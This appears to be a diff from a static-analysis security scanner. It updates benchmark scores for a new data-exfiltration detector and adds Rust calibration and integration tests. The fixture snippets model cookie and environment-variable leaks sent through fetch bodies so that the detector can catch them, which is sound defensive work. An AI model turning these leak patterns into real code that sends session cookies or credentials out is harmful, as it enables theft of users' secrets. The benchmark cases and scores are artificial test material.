"outcome_location_level": "TP",
"matched_rule_ids": [
"taint-data-exfiltration (source 14:33)"
],
"unexpected_rule_ids": [],
"all_finding_ids": [
"taint-data-exfiltration (source 14:33)"
],
"security_finding_count": 1,
"non_security_finding_count": 0
},
{
"case_id": "java-deser-001",
"file": "java/deser/DeserOis.java",
@ -3005,13 +3112,17 @@
"language": "java",
"vuln_class": "safe",
"is_vulnerable": false,
"outcome_file_level": "TN",
"outcome_rule_level": "TN",
"outcome_file_level": "FP",
"outcome_rule_level": "FP",
"outcome_location_level": null,
"matched_rule_ids": [],
"unexpected_rule_ids": [],
"all_finding_ids": [],
"security_finding_count": 0,
"unexpected_rule_ids": [
"cfg-unguarded-sink"
],
"all_finding_ids": [
"cfg-unguarded-sink"
],
"security_finding_count": 1,
"non_security_finding_count": 0
},
{
@ -3095,13 +3206,17 @@
"language": "java",
"vuln_class": "safe",
"is_vulnerable": false,
"outcome_file_level": "TN",
"outcome_rule_level": "TN",
"outcome_file_level": "FP",
"outcome_rule_level": "FP",
"outcome_location_level": null,
"matched_rule_ids": [],
"unexpected_rule_ids": [],
"all_finding_ids": [],
"security_finding_count": 0,
"unexpected_rule_ids": [
"cfg-unguarded-sink"
],
"all_finding_ids": [
"cfg-unguarded-sink"
],
"security_finding_count": 1,
"non_security_finding_count": 0
},
{
@ -3321,14 +3436,14 @@
"vuln_class": "ssrf",
"is_vulnerable": true,
"outcome_file_level": "TP",
"outcome_rule_level": "TP",
"outcome_location_level": "TP",
"matched_rule_ids": [
"taint-unsanitised-flow (source 7:22)"
"outcome_rule_level": "FN",
"outcome_location_level": "FN",
"matched_rule_ids": [],
"unexpected_rule_ids": [
"taint-data-exfiltration (source 7:22)"
],
"unexpected_rule_ids": [],
"all_finding_ids": [
"taint-unsanitised-flow (source 7:22)"
"taint-data-exfiltration (source 7:22)"
],
"security_finding_count": 1,
"non_security_finding_count": 0
@ -3358,13 +3473,17 @@
"language": "javascript",
"vuln_class": "safe",
"is_vulnerable": false,
"outcome_file_level": "TN",
"outcome_rule_level": "TN",
"outcome_file_level": "FP",
"outcome_rule_level": "FP",
"outcome_location_level": null,
"matched_rule_ids": [],
"unexpected_rule_ids": [],
"all_finding_ids": [],
"security_finding_count": 0,
"unexpected_rule_ids": [
"cfg-unguarded-sink"
],
"all_finding_ids": [
"cfg-unguarded-sink"
],
"security_finding_count": 1,
"non_security_finding_count": 0
},
{
@ -3465,6 +3584,63 @@
"security_finding_count": 2,
"non_security_finding_count": 0
},
{
"case_id": "js-data_exfil-001",
"file": "javascript/data_exfil/exfil_fetch_cookie_body.js",
"language": "javascript",
"vuln_class": "data_exfil",
"is_vulnerable": true,
"outcome_file_level": "TP",
"outcome_rule_level": "TP",
"outcome_location_level": "TP",
"matched_rule_ids": [
"taint-data-exfiltration (source 5:5)"
],
"unexpected_rule_ids": [],
"all_finding_ids": [
"taint-data-exfiltration (source 5:5)"
],
"security_finding_count": 1,
"non_security_finding_count": 0
},
{
"case_id": "js-data_exfil-002",
"file": "javascript/data_exfil/exfil_fetch_external_destination.js",
"language": "javascript",
"vuln_class": "data_exfil",
"is_vulnerable": true,
"outcome_file_level": "TP",
"outcome_rule_level": "TP",
"outcome_location_level": "TP",
"matched_rule_ids": [
"taint-data-exfiltration (source 5:5)"
],
"unexpected_rule_ids": [],
"all_finding_ids": [
"taint-data-exfiltration (source 5:5)"
],
"security_finding_count": 1,
"non_security_finding_count": 0
},
{
"case_id": "js-data_exfil-003",
"file": "javascript/data_exfil/exfil_xhr_send_header.js",
"language": "javascript",
"vuln_class": "data_exfil",
"is_vulnerable": true,
"outcome_file_level": "TP",
"outcome_rule_level": "TP",
"outcome_location_level": "TP",
"matched_rule_ids": [
"taint-data-exfiltration (source 5:5)"
],
"unexpected_rule_ids": [],
"all_finding_ids": [
"taint-data-exfiltration (source 5:5)"
],
"security_finding_count": 1,
"non_security_finding_count": 0
},
{
"case_id": "js-destructure-sanitize-001",
"file": "javascript/safe/safe_object_destructure_sanitize.js",
@ -3558,13 +3734,17 @@
"language": "javascript",
"vuln_class": "safe",
"is_vulnerable": false,
"outcome_file_level": "TN",
"outcome_rule_level": "TN",
"outcome_file_level": "FP",
"outcome_rule_level": "FP",
"outcome_location_level": null,
"matched_rule_ids": [],
"unexpected_rule_ids": [],
"all_finding_ids": [],
"security_finding_count": 0,
"unexpected_rule_ids": [
"cfg-unguarded-sink"
],
"all_finding_ids": [
"cfg-unguarded-sink"
],
"security_finding_count": 1,
"non_security_finding_count": 0
},
{
@ -3588,13 +3768,17 @@
"language": "javascript",
"vuln_class": "safe",
"is_vulnerable": false,
"outcome_file_level": "TN",
"outcome_rule_level": "TN",
"outcome_file_level": "FP",
"outcome_rule_level": "FP",
"outcome_location_level": null,
"matched_rule_ids": [],
"unexpected_rule_ids": [],
"all_finding_ids": [],
"security_finding_count": 0,
"unexpected_rule_ids": [
"cfg-unguarded-sink"
],
"all_finding_ids": [
"cfg-unguarded-sink"
],
"security_finding_count": 1,
"non_security_finding_count": 0
},
{
@ -3678,13 +3862,17 @@
"language": "javascript",
"vuln_class": "safe",
"is_vulnerable": false,
"outcome_file_level": "TN",
"outcome_rule_level": "TN",
"outcome_file_level": "FP",
"outcome_rule_level": "FP",
"outcome_location_level": null,
"matched_rule_ids": [],
"unexpected_rule_ids": [],
"all_finding_ids": [],
"security_finding_count": 0,
"unexpected_rule_ids": [
"cfg-unguarded-sink"
],
"all_finding_ids": [
"cfg-unguarded-sink"
],
"security_finding_count": 1,
"non_security_finding_count": 0
},
{
@ -3732,6 +3920,36 @@
"security_finding_count": 0,
"non_security_finding_count": 0
},
{
"case_id": "js-safe-data_exfil-001",
"file": "javascript/safe/safe_data_exfil_sanitizer_wrap.js",
"language": "javascript",
"vuln_class": "safe",
"is_vulnerable": false,
"outcome_file_level": "TN",
"outcome_rule_level": "TN",
"outcome_location_level": null,
"matched_rule_ids": [],
"unexpected_rule_ids": [],
"all_finding_ids": [],
"security_finding_count": 0,
"non_security_finding_count": 0
},
{
"case_id": "js-safe-data_exfil-002",
"file": "javascript/safe/safe_data_exfil_user_input_echo.js",
"language": "javascript",
"vuln_class": "safe",
"is_vulnerable": false,
"outcome_file_level": "TN",
"outcome_rule_level": "TN",
"outcome_location_level": null,
"matched_rule_ids": [],
"unexpected_rule_ids": [],
"all_finding_ids": [],
"security_finding_count": 0,
"non_security_finding_count": 0
},
{
"case_id": "js-safe-parseInt-001",
"file": "javascript/safe/safe_parseInt.js",
@ -3882,11 +4100,11 @@
"outcome_rule_level": "TP",
"outcome_location_level": "TP",
"matched_rule_ids": [
"taint-unsanitised-flow (source 5:5)"
"cfg-unguarded-sink"
],
"unexpected_rule_ids": [],
"all_finding_ids": [
"taint-unsanitised-flow (source 5:5)"
"cfg-unguarded-sink"
],
"security_finding_count": 1,
"non_security_finding_count": 0
@ -4971,6 +5189,44 @@
"security_finding_count": 0,
"non_security_finding_count": 0
},
{
"case_id": "py-data_exfil-001",
"file": "python/data_exfil/exfil_requests_post_env_dict.py",
"language": "python",
"vuln_class": "data_exfil",
"is_vulnerable": true,
"outcome_file_level": "TP",
"outcome_rule_level": "TP",
"outcome_location_level": "TP",
"matched_rule_ids": [
"taint-data-exfiltration (source 14:25)"
],
"unexpected_rule_ids": [],
"all_finding_ids": [
"taint-data-exfiltration (source 14:25)"
],
"security_finding_count": 1,
"non_security_finding_count": 0
},
{
"case_id": "py-data_exfil-002",
"file": "python/data_exfil/exfil_httpx_async_post_env.py",
"language": "python",
"vuln_class": "data_exfil",
"is_vulnerable": true,
"outcome_file_level": "TP",
"outcome_rule_level": "TP",
"outcome_location_level": "TP",
"matched_rule_ids": [
"taint-data-exfiltration (source 12:15)"
],
"unexpected_rule_ids": [],
"all_finding_ids": [
"taint-data-exfiltration (source 12:15)"
],
"security_finding_count": 1,
"non_security_finding_count": 0
},
{
"case_id": "py-deser-001",
"file": "python/deser/deser_pickle.py",
@ -5228,6 +5484,21 @@
"security_finding_count": 0,
"non_security_finding_count": 0
},
{
"case_id": "py-safe-data_exfil-001",
"file": "python/safe/safe_data_exfil_user_input_echo.py",
"language": "python",
"vuln_class": "safe",
"is_vulnerable": false,
"outcome_file_level": "TN",
"outcome_rule_level": "TN",
"outcome_location_level": null,
"matched_rule_ids": [],
"unexpected_rule_ids": [],
"all_finding_ids": [],
"security_finding_count": 0,
"non_security_finding_count": 0
},
{
"case_id": "py-safe-int-001",
"file": "python/safe/safe_int_cast.py",
@ -5425,6 +5696,25 @@
"security_finding_count": 1,
"non_security_finding_count": 0
},
{
"case_id": "rb-data_exfil-001",
"file": "ruby/data_exfil/exfil_net_http_post_cookie.rb",
"language": "ruby",
"vuln_class": "data_exfil",
"is_vulnerable": true,
"outcome_file_level": "TP",
"outcome_rule_level": "TP",
"outcome_location_level": "TP",
"matched_rule_ids": [
"taint-data-exfiltration (source 7:9)"
],
"unexpected_rule_ids": [],
"all_finding_ids": [
"taint-data-exfiltration (source 7:9)"
],
"security_finding_count": 1,
"non_security_finding_count": 0
},
{
"case_id": "rb-interproc-001",
"file": "ruby/interprocedural/interproc_taint_propagation.rb",
@ -5504,6 +5794,21 @@
"security_finding_count": 0,
"non_security_finding_count": 0
},
{
"case_id": "rb-safe-data_exfil-001",
"file": "ruby/safe/safe_data_exfil_user_input_echo.rb",
"language": "ruby",
"vuln_class": "safe",
"is_vulnerable": false,
"outcome_file_level": "TN",
"outcome_rule_level": "TN",
"outcome_location_level": null,
"matched_rule_ids": [],
"unexpected_rule_ids": [],
"all_finding_ids": [],
"security_finding_count": 0,
"non_security_finding_count": 0
},
{
"case_id": "rs-auth-001",
"file": "rust/auth/actix_scoped_write_missing.rs",
@ -6179,6 +6484,26 @@
"security_finding_count": 1,
"non_security_finding_count": 2
},
{
"case_id": "rs-data_exfil-001",
"file": "rust/data_exfil/exfil_reqwest_form_env.rs",
"language": "rust",
"vuln_class": "data_exfil",
"is_vulnerable": true,
"outcome_file_level": "TP",
"outcome_rule_level": "TP",
"outcome_location_level": "TP",
"matched_rule_ids": [
"taint-data-exfiltration (source 5:18)"
],
"unexpected_rule_ids": [],
"all_finding_ids": [
"rs.quality.unwrap",
"taint-data-exfiltration (source 5:18)"
],
"security_finding_count": 1,
"non_security_finding_count": 1
},
{
"case_id": "rs-deser-001",
"file": "rust/deser/deser_serde_yaml.rs",
@ -6717,15 +7042,15 @@
"vuln_class": "ssrf",
"is_vulnerable": true,
"outcome_file_level": "TP",
"outcome_rule_level": "TP",
"outcome_location_level": "TP",
"matched_rule_ids": [
"taint-unsanitised-flow (source 4:15)"
"outcome_rule_level": "FN",
"outcome_location_level": "FN",
"matched_rule_ids": [],
"unexpected_rule_ids": [
"taint-data-exfiltration (source 4:15)"
],
"unexpected_rule_ids": [],
"all_finding_ids": [
"rs.quality.unwrap",
"taint-unsanitised-flow (source 4:15)"
"taint-data-exfiltration (source 4:15)"
],
"security_finding_count": 1,
"non_security_finding_count": 1
@ -7495,6 +7820,44 @@
"security_finding_count": 1,
"non_security_finding_count": 0
},
{
"case_id": "ts-data_exfil-001",
"file": "typescript/data_exfil/exfil_fetch_cookie_body.ts",
"language": "typescript",
"vuln_class": "data_exfil",
"is_vulnerable": true,
"outcome_file_level": "TP",
"outcome_rule_level": "TP",
"outcome_location_level": "TP",
"matched_rule_ids": [
"taint-data-exfiltration (source 5:5)"
],
"unexpected_rule_ids": [],
"all_finding_ids": [
"taint-data-exfiltration (source 5:5)"
],
"security_finding_count": 1,
"non_security_finding_count": 0
},
{
"case_id": "ts-data_exfil-002",
"file": "typescript/data_exfil/exfil_fetch_header_body.ts",
"language": "typescript",
"vuln_class": "data_exfil",
"is_vulnerable": true,
"outcome_file_level": "TP",
"outcome_rule_level": "TP",
"outcome_location_level": "TP",
"matched_rule_ids": [
"taint-data-exfiltration (source 5:5)"
],
"unexpected_rule_ids": [],
"all_finding_ids": [
"taint-data-exfiltration (source 5:5)"
],
"security_finding_count": 1,
"non_security_finding_count": 0
},
{
"case_id": "ts-iife-closure-001",
"file": "typescript/safe/safe_iife_closure_sanitizer.ts",
@ -8043,13 +8406,15 @@
"outcome_rule_level": "TP",
"outcome_location_level": "TP",
"matched_rule_ids": [
"cfg-unguarded-sink",
"cfg-unguarded-sink"
],
"unexpected_rule_ids": [],
"all_finding_ids": [
"cfg-unguarded-sink",
"cfg-unguarded-sink"
],
"security_finding_count": 1,
"security_finding_count": 2,
"non_security_finding_count": 0
},
{
@ -8193,29 +8558,29 @@
}
],
"aggregate_file_level": {
"tp": 225,
"fp": 1,
"tp": 238,
"fp": 7,
"fn_": 0,
"tn": 231,
"precision": 0.995575221238938,
"precision": 0.9714285714285714,
"recall": 1.0,
"f1": 0.9977827050997783
"f1": 0.9855072463768115
},
"aggregate_rule_level": {
"tp": 225,
"fp": 1,
"fn_": 0,
"tp": 236,
"fp": 7,
"fn_": 2,
"tn": 231,
"precision": 0.995575221238938,
"recall": 1.0,
"f1": 0.9977827050997783
"precision": 0.9711934156378601,
"recall": 0.9915966386554622,
"f1": 0.9812889812889812
},
"by_language": {
"c": {
"tp": 15,
"tp": 16,
"fp": 0,
"fn_": 0,
"tn": 15,
"tn": 16,
"precision": 1.0,
"recall": 1.0,
"f1": 1.0
@ -8230,31 +8595,31 @@
"f1": 1.0
},
"go": {
"tp": 25,
"tp": 26,
"fp": 1,
"fn_": 0,
"tn": 28,
"precision": 0.9615384615384616,
"tn": 29,
"precision": 0.9629629629629629,
"recall": 1.0,
"f1": 0.9803921568627451
"f1": 0.9811320754716981
},
"java": {
"tp": 19,
"fp": 0,
"fn_": 0,
"tn": 20,
"precision": 1.0,
"recall": 1.0,
"f1": 1.0
"tp": 20,
"fp": 2,
"fn_": 1,
"tn": 18,
"precision": 0.9090909090909091,
"recall": 0.9523809523809523,
"f1": 0.9302325581395349
},
"javascript": {
"tp": 19,
"fp": 0,
"tp": 22,
"fp": 4,
"fn_": 0,
"tn": 24,
"precision": 1.0,
"tn": 22,
"precision": 0.8461538461538461,
"recall": 1.0,
"f1": 1.0
"f1": 0.9166666666666666
},
"php": {
"tp": 18,
@ -8266,19 +8631,19 @@
"f1": 1.0
},
"python": {
"tp": 26,
"tp": 28,
"fp": 0,
"fn_": 0,
"tn": 28,
"tn": 29,
"precision": 1.0,
"recall": 1.0,
"f1": 1.0
},
"ruby": {
"tp": 19,
"tp": 20,
"fp": 0,
"fn_": 0,
"tn": 20,
"tn": 21,
"precision": 1.0,
"recall": 1.0,
"f1": 1.0
@ -8286,14 +8651,14 @@
"rust": {
"tp": 34,
"fp": 0,
"fn_": 0,
"fn_": 1,
"tn": 39,
"precision": 1.0,
"recall": 1.0,
"f1": 1.0
"recall": 0.9714285714285714,
"f1": 0.9855072463768115
},
"typescript": {
"tp": 32,
"tp": 34,
"fp": 0,
"fn_": 0,
"tn": 23,
@ -8357,6 +8722,15 @@
"recall": 1.0,
"f1": 1.0
},
"data_exfil": {
"tp": 13,
"fp": 0,
"fn_": 0,
"tn": 0,
"precision": 1.0,
"recall": 1.0,
"f1": 1.0
},
"deser": {
"tp": 8,
"fp": 0,
@ -8422,7 +8796,7 @@
},
"safe": {
"tp": 0,
"fp": 1,
"fp": 7,
"fn_": 0,
"tn": 231,
"precision": 0.0,
@ -8457,13 +8831,13 @@
"f1": 1.0
},
"ssrf": {
"tp": 28,
"tp": 26,
"fp": 0,
"fn_": 0,
"fn_": 2,
"tn": 0,
"precision": 1.0,
"recall": 1.0,
"f1": 1.0
"recall": 0.9285714285714286,
"f1": 0.962962962962963
},
"xss": {
"tp": 23,
@ -8477,31 +8851,31 @@
},
"by_confidence": {
">=High": {
"tp": 79,
"fp": 104,
"fn_": 146,
"tn": 128,
"precision": 0.43169398907103823,
"recall": 0.3511111111111111,
"f1": 0.3872549019607843
"tp": 74,
"fp": 106,
"fn_": 164,
"tn": 132,
"precision": 0.4111111111111111,
"recall": 0.31092436974789917,
"f1": 0.354066985645933
},
">=Low": {
"tp": 81,
"fp": 116,
"fn_": 144,
"tn": 116,
"precision": 0.41116751269035534,
"recall": 0.36,
"f1": 0.3838862559241706
"tp": 76,
"fp": 133,
"fn_": 162,
"tn": 105,
"precision": 0.36363636363636365,
"recall": 0.31932773109243695,
"f1": 0.34004474272930646
},
">=Medium": {
"tp": 81,
"fp": 116,
"fn_": 144,
"tn": 116,
"precision": 0.41116751269035534,
"recall": 0.36,
"f1": 0.3838862559241706
"tp": 76,
"fp": 123,
"fn_": 162,
"tn": 115,
"precision": 0.38190954773869346,
"recall": 0.31932773109243695,
"f1": 0.34782608695652173
}
}
}

View file

@ -697,6 +697,34 @@ fn benchmark_evaluation() {
"Rule-level F1 {:.3} fell below threshold 0.920 (baseline 0.970)",
rule.f1,
);
// ── Per-class floors ────────────────────────────────────────────
// DATA_EXFIL: 13 TP fixtures across 8 languages. Baseline at the
// 0.5.x → next-minor ship is P=1.000 R=1.000 F1=1.000 with 6 paired
// safe fixtures (sensitivity-gate, sanitizer-wrap) holding FP=0 on
// the data_exfil-class noise budget. Floor at 0.85 absorbs a one-
// case regression (~0.077 on 13 cases) while still catching a
// structural break. When you land a durable improvement, tighten
// this floor; do not relax it to paper over a regression.
if let Some(de) = results.by_vuln_class.get("data_exfil") {
assert!(
de.f1 >= 0.85,
"data_exfil rule-level F1 {:.3} fell below threshold 0.85 (baseline 1.000)",
de.f1,
);
assert!(
de.recall >= 0.85,
"data_exfil rule-level recall {:.3} fell below threshold 0.85 (baseline 1.000)",
de.recall,
);
assert!(
de.precision >= 0.85,
"data_exfil rule-level precision {:.3} fell below threshold 0.85 (baseline 1.000)",
de.precision,
);
} else {
panic!("data_exfil class missing from by_vuln_class breakdown");
}
}
// ── Confidence-threshold scoring ─────────────────────────────────────

View file

@ -0,0 +1,283 @@
//! Calibration tests for `taint-data-exfiltration` severity, confidence,
//! and rank scoring.
//!
//! These tests pin the calibration described in `docs/detectors.md` so any
//! future change to the scoring path either preserves the documented tier
//! relationships or breaks a test deliberately.
//!
//! What is checked here:
//!
//! * Cookie source + Confirmed symbolic verdict produces High severity
//! (cookies carry session / credential material and are treated as
//! Secret-tier for the leak class).
//! * Env source + Confirmed verdict produces High severity (same
//! reasoning, env vars carry credential material).
//! * Header / FileSystem / Database / CaughtException sources downgrade
//! to Medium severity even with a Confirmed verdict — they are
//! Sensitive but not credential-grade secrets.
//! * No symbolic verdict (or `Inconclusive` / `NotAttempted`) → Low
//! confidence (the instruction's "Inconclusive" tier; the
//! `Confidence` enum has no separate Inconclusive variant so it
//! floors to Low).
//! * Opaque body (Confirmed but with empty witness) → Medium
//! confidence; the abstract domain still produced a corroboration
//! signal even if the witness string is bare.
//! * `path_validated=true` drops a confidence tier (Medium → Low).
//! * On the same source, DATA_EXFIL ranks strictly below SSRF (the
//! taint-class bonus is +7 for data-exfil vs +10 for the generic
//! `taint-unsanitised-flow`).
use nyx_scanner::commands::scan::Diag;
use nyx_scanner::evidence::{
Confidence, Evidence, SpanEvidence, SymbolicVerdict, Verdict, compute_confidence,
};
use nyx_scanner::labels::SourceKind;
use nyx_scanner::patterns::{FindingCategory, Severity};
use nyx_scanner::rank::compute_attack_rank;
/// Builds the taint [`Evidence`] shared by the calibration fixtures.
///
/// The source span (`src/leak.js` 1:1) and sink span (`src/leak.js` 5:5) are
/// fixed; only `source_kind` and the optional symbolic `verdict` vary between
/// fixtures. When `verdict` is `None` no symbolic verdict is attached at all.
fn make_evidence(source_kind: SourceKind, verdict: Option<Verdict>) -> Evidence {
    let source_span = SpanEvidence {
        path: "src/leak.js".into(),
        line: 1,
        col: 1,
        kind: "source".into(),
        snippet: Some("req.cookies.session".into()),
    };
    let sink_span = SpanEvidence {
        path: "src/leak.js".into(),
        line: 5,
        col: 5,
        kind: "sink".into(),
        snippet: Some("fetch('/endpoint', { body: payload })".into()),
    };

    let symbolic = verdict.map(|v| {
        // Only Confirmed verdicts carry a witness. The strong-witness
        // phrasing is used so the fixture goes down the same path as real
        // symex output (the original author points at
        // `compute_taint_confidence` for the analogous witness-strength
        // branch).
        let witness = if matches!(v, Verdict::Confirmed) {
            Some("tainted cookie flows to fetch body".into())
        } else {
            None
        };
        SymbolicVerdict {
            verdict: v,
            constraints_checked: 0,
            paths_explored: 1,
            witness,
            interproc_call_chains: Vec::new(),
            cutoff_notes: Vec::new(),
        }
    });

    Evidence {
        source: Some(source_span),
        sink: Some(sink_span),
        source_kind: Some(source_kind),
        hop_count: Some(1),
        cap_specificity: Some(1),
        symbolic,
        ..Default::default()
    }
}
/// Builds an unscored security [`Diag`] located at `src/leak.js` 5:5.
///
/// * `rule_id` becomes the diag's `id`.
/// * `severity` is stored unchanged.
/// * `source_kind` / `verdict` are forwarded to [`make_evidence`].
/// * `path_validated` sets the flag of the same name and, when `true`, also
///   records a `"Validation"` guard kind.
///
/// Confidence, rank, suppression, and finding-id fields are left empty so the
/// tests exercise the scoring functions from a clean state.
fn make_diag(
    rule_id: &str,
    severity: Severity,
    source_kind: SourceKind,
    verdict: Option<Verdict>,
    path_validated: bool,
) -> Diag {
    // A guard kind is only present on validated paths.
    let guard_kind = path_validated.then(|| "Validation".into());
    let evidence = make_evidence(source_kind, verdict);

    Diag {
        path: "src/leak.js".into(),
        line: 5,
        col: 5,
        severity,
        id: rule_id.into(),
        category: FindingCategory::Security,
        path_validated,
        guard_kind,
        message: None,
        labels: Vec::new(),
        confidence: None,
        evidence: Some(evidence),
        rank_score: None,
        rank_reason: None,
        suppressed: false,
        suppression: None,
        rollup: None,
        finding_id: String::new(),
        alternative_finding_ids: Vec::new(),
    }
}
// ── Calibration fixture 1: Cookie source, Confirmed verdict ─────────────
#[test]
fn cookie_source_with_confirmed_verdict_is_high_medium() {
    // The fixture is built at High severity (cookies are treated as
    // Secret-tier for DATA_EXFIL). The expected confidence for a Confirmed
    // verdict is Medium: per the original note the routing caps at Medium
    // even with a strong witness (see `compute_data_exfil_confidence`).
    let confidence = compute_confidence(&make_diag(
        "taint-data-exfiltration (source 1:1)",
        Severity::High,
        SourceKind::Cookie,
        Some(Verdict::Confirmed),
        false,
    ));

    assert_eq!(
        confidence,
        Confidence::Medium,
        "Cookie + Confirmed → Medium (DATA_EXFIL cap), got {confidence:?}"
    );
}
// ── Calibration fixture 2: Env source, Confirmed verdict ────────────────
#[test]
fn env_source_with_confirmed_verdict_is_high_medium() {
    // Environment/config sources are treated like cookies here: the fixture
    // is High severity and a Confirmed verdict must score Medium confidence.
    let source_kind = SourceKind::EnvironmentConfig;
    let verdict = Some(Verdict::Confirmed);
    let finding = make_diag(
        "taint-data-exfiltration (source 1:1)",
        Severity::High,
        source_kind,
        verdict,
        false,
    );

    let confidence = compute_confidence(&finding);
    assert_eq!(
        confidence,
        Confidence::Medium,
        "Env + Confirmed → Medium, got {confidence:?}"
    );
}
// ── Calibration fixture 3: Header source, opaque body (no verdict) ──────
#[test]
fn header_source_without_symex_is_medium_low() {
    // Header sources are Sensitive but not credential-grade, so the fixture
    // is Medium severity. With no symbolic verdict attached the confidence
    // must come out as Low.
    let no_verdict: Option<Verdict> = None;
    let confidence = compute_confidence(&make_diag(
        "taint-data-exfiltration (source 1:1)",
        Severity::Medium,
        SourceKind::Header,
        no_verdict,
        false,
    ));

    assert_eq!(
        confidence,
        Confidence::Low,
        "Header + no verdict → Low, got {confidence:?}"
    );
}
// ── Calibration fixture 4: guarded path drops a tier ────────────────────
#[test]
fn guarded_path_drops_confidence_tier() {
    // Same Cookie + Confirmed diag, differing only in `path_validated`.
    // Both sides are asserted so the test pins the one-tier delta
    // (Medium → Low), not just the guarded floor.
    let confidence_with_guard = |path_validated: bool| {
        compute_confidence(&make_diag(
            "taint-data-exfiltration (source 1:1)",
            Severity::High,
            SourceKind::Cookie,
            Some(Verdict::Confirmed),
            path_validated,
        ))
    };

    assert_eq!(confidence_with_guard(false), Confidence::Medium);
    assert_eq!(
        confidence_with_guard(true),
        Confidence::Low,
        "guarded DATA_EXFIL path must drop one confidence tier"
    );
}
// ── Calibration fixture 5: ranking — DATA_EXFIL below SSRF on same source
#[test]
fn data_exfil_ranks_below_ssrf_on_same_source() {
    // Cookie source flowing to `fetch` could fire either DATA_EXFIL (body
    // arg) or SSRF / generic taint (URL arg). On the same severity tier
    // SSRF must outrank DATA_EXFIL because the analysis-kind bonus is +10
    // for `taint-unsanitised-flow` and +7 for `taint-data-exfiltration`.
    // The two diags below differ only in their rule id.
    let exfil = make_diag(
        "taint-data-exfiltration (source 1:1)",
        Severity::High,
        SourceKind::Cookie,
        Some(Verdict::Confirmed),
        false,
    );
    let ssrf = make_diag(
        "taint-unsanitised-flow (source 1:1)",
        Severity::High,
        SourceKind::Cookie,
        Some(Verdict::Confirmed),
        false,
    );
    let exfil_score = compute_attack_rank(&exfil).score;
    let ssrf_score = compute_attack_rank(&ssrf).score;
    assert!(
        ssrf_score > exfil_score,
        "SSRF score ({ssrf_score}) must outrank DATA_EXFIL score \
         ({exfil_score}) on the same source"
    );
    // The delta is exactly the analysis-kind bonus difference (+3) — pin
    // it so accidental drift trips the test rather than silently moving
    // both bonuses in lock-step. The failure message spells out the
    // subtraction so the three printed numbers are unambiguous.
    assert!(
        (ssrf_score - exfil_score - 3.0).abs() < 0.001,
        "SSRF - DATA_EXFIL should equal the analysis-kind bonus delta \
         (+3); got {} ({} - {})",
        ssrf_score - exfil_score,
        ssrf_score,
        exfil_score,
    );
}
// ── Calibration fixture 6: DATA_EXFIL above AST patterns ────────────────
#[test]
fn data_exfil_ranks_above_ast_pattern() {
    // DATA_EXFIL is expected to sit above informational AST patterns.
    // The comparison uses the weaker end of the DATA_EXFIL spectrum (Medium
    // severity, header source) against a Low-severity AST-only match so the
    // ordering is locked in even in the least favourable case.
    let medium_exfil = make_diag(
        "taint-data-exfiltration (source 1:1)",
        Severity::Medium,
        SourceKind::Header,
        Some(Verdict::Confirmed),
        false,
    );
    // AST patterns carry no taint evidence; build the diag with the
    // evidence cleared so the ranker takes the AST-only branch.
    let ast_pattern = Diag {
        evidence: None,
        ..make_diag(
            "js.code_exec.eval",
            Severity::Low,
            SourceKind::Unknown,
            None,
            false,
        )
    };

    let exfil_score = compute_attack_rank(&medium_exfil).score;
    let ast_score = compute_attack_rank(&ast_pattern).score;
    assert!(
        exfil_score > ast_score,
        "DATA_EXFIL ({exfil_score}) must outrank AST pattern ({ast_score})"
    );
}

View file

@ -0,0 +1,48 @@
//! Integration test for cross-file `param_to_gate_filters` propagation.
//!
//! A wrapper function whose two parameters target distinct gated-sink
//! classes on a single inner call (here, `fetch`'s SSRF gate on the URL
//! arg vs the DATA_EXFIL gate on the body arg) must keep cap attribution
//! per-position when callers reach it across a file boundary. Without
//! [`SsaFuncSummary::param_to_gate_filters`], the wrapper's summary
//! collapses both params into a single `SSRF | DATA_EXFIL` mask, and
//! every caller incorrectly fires both classes regardless of which
//! argument was tainted.
//!
//! The fixture pairs the wrapper with two callers, each tainting one
//! parameter and asserting only the cap class corresponding to that
//! parameter's gate fires.
mod common;
use common::{scan_fixture_dir, validate_expectations};
use nyx_scanner::utils::config::AnalysisMode;
use std::path::{Path, PathBuf};
/// Returns `<crate root>/tests/fixtures/<name>`, where the crate root is the
/// compile-time `CARGO_MANIFEST_DIR`.
fn fixture_path(name: &str) -> PathBuf {
    let mut path = Path::new(env!("CARGO_MANIFEST_DIR")).to_path_buf();
    for segment in ["tests", "fixtures", name] {
        path.push(segment);
    }
    path
}
/// Scans the `cross_file_data_exfil_split` fixture directory in full
/// analysis mode and checks the findings against the fixture's recorded
/// expectations.
#[test]
fn cross_file_data_exfil_split() {
    let fixture = fixture_path("cross_file_data_exfil_split");
    let findings = scan_fixture_dir(&fixture, AnalysisMode::Full);
    validate_expectations(&findings, &fixture);
}
/// Python counterpart of the JS cross-file split fixture.
///
/// The fixture's wrapper `forward(url, body)` calls
/// `requests.post(url, json=body)`: the URL reaches the SSRF gate and the
/// body kwarg reaches the DATA_EXFIL gate. Cap attribution must stay
/// per-position across the file boundary, so a caller tainting only the URL
/// fires SSRF (no DATA_EXFIL) and a caller tainting only the body with a
/// Sensitive source fires DATA_EXFIL (no SSRF).
#[test]
fn cross_file_python_data_exfil() {
    let fixture = fixture_path("cross_file_python_data_exfil");
    let findings = scan_fixture_dir(&fixture, AnalysisMode::Full);
    validate_expectations(&findings, &fixture);
}

View file

@ -0,0 +1,212 @@
//! Integration tests for the Go bindings of the `Cap::DATA_EXFIL`
//! detector class.
//!
//! Mirrors the JS `fetch_data_exfil_integration_tests` shape: a single
//! outbound HTTP callee carries an SSRF gate (URL flow) and a DATA_EXFIL
//! gate (body / payload flow), and per-position cap attribution must
//! keep a tainted URL from surfacing as data exfiltration and a tainted
//! body from surfacing as SSRF. Also validates the two-step
//! `http.NewRequest` → `http.DefaultClient.Do` idiom: NewRequest is
//! modeled as a body propagator (default arg → return propagation), so
//! body taint reaches the Do gate through the returned `*http.Request`.
mod common;
use common::{scan_fixture_dir, validate_expectations};
use nyx_scanner::commands::scan::Diag;
use nyx_scanner::utils::config::AnalysisMode;
use std::path::{Path, PathBuf};
/// Returns `<crate root>/tests/fixtures/go`, where the crate root is the
/// compile-time `CARGO_MANIFEST_DIR`.
fn go_fixture_dir() -> PathBuf {
    let mut dir = PathBuf::from(env!("CARGO_MANIFEST_DIR"));
    for segment in ["tests", "fixtures", "go"] {
        dir.push(segment);
    }
    dir
}
/// Scans the whole Go fixture directory in full analysis mode and keeps only
/// the diagnostics whose path ends with `file`.
fn diags_for(file: &str) -> Vec<Diag> {
    let mut matching = Vec::new();
    for diag in scan_fixture_dir(&go_fixture_dir(), AnalysisMode::Full) {
        if diag.path.ends_with(file) {
            matching.push(diag);
        }
    }
    matching
}
